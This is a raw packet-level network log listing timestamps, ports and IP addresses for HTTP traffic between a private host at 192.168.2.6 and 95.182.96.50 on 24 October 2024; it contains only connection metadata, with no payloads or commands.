Oct 24, 2024 13:54:21.828082085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828119040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828131914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828152895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828197002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828207016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828259945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828316927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828316927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828351974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828371048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828394890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828411102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828463078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828496933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828511000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828530073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828536034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828584909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828618050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828638077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828654051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828687906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828696966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828742027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828777075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828809023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828819036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828831911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828866005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828921080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828938007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828954935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828990936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828999996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829041004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829045057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829077959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829111099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829144001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829150915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829169989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829193115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829204082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829238892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829261065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829269886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829303980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829315901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829338074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829343081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829372883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829406023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829416990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829442024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829451084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829473972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829507113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829519033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829545975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829550028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829580069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829613924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829648018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829659939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829683065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829691887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829718113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829752922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829773903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829786062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829822063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829832077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829855919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829859972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829891920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829932928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829943895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829967022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.829987049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.829997063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830008984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830032110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830066919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830080032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830100060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830133915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830148935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830172062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830205917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830216885 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830239058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830249071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830276012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830311060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830343008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830354929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830377102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830387115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830410957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830444098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830455065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830481052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830570936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830584049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830606937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830615044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830642939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830651999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830678940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830688000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830713987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830723047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830749035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830782890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830797911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830817938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830826044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830852985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830888033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830900908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830921888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830933094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.830960035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.830991983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831026077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831037998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831059933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831069946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831095934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831130028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831163883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831175089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831197023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831231117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831264973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831264973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831281900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831299067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831306934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831342936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831353903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831387997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831422091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831432104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831455946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831490993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831526041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831526995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831562996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831594944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831629038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831640959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831662893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.831675053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.831772089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941344023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941406965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941415071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941498995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941545010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941555977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941610098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941646099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941656113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941709042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941757917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941767931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941800117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941817045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941850901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941850901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941859007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941898108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941942930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.941950083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.941987038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942007065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942020893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942032099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942056894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942068100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942111969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942152977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942161083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942167044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942208052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942219019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942243099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942255974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942276955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942292929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942321062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942354918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942368031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942390919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942424059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942457914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942460060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942495108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942504883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942532063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942564964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942574024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942600012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942624092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942635059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942648888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942671061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942701101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942713022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942734957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942769051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942801952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942812920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942842960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942873001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942907095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942919016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942943096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.942961931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.942976952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.943011045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.943016052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.943042994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.943053007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.943082094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.943111897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.943169117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.989468098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.995134115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218609095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218656063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218708038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.218724012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218751907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.218777895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.218780994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218817949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218857050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218873024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.218890905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218908072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.218926907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218961954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.218981981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.218997002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219011068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219032049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219067097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219095945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219121933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219136953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219150066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219203949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219238043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219254017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219274044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219280958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219310045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219330072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219382048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219397068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219430923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219439983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219487906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219523907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219546080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219558001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219602108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219611883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219645977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219681025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219691992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219715118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219749928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219758987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219784975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219796896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219822884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219914913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219949961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219973087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.219984055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.219990969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220020056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220057011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220067024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220098972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220129967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220145941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220169067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220185041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220218897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220253944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220263004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220307112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220343113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220375061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220382929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220432043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220484972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220500946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220541000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220575094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220591068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220609903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220630884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220664978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220712900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220716953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220767021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220813990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220820904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220855951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220905066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220909119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.220969915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.220973969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221019030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221049070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221054077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221074104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221085072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221096039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221121073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221154928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221183062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221196890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221199036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221244097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.221251011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.221304893 CEST	80	49714	95.182.96.50	192.168.2.6
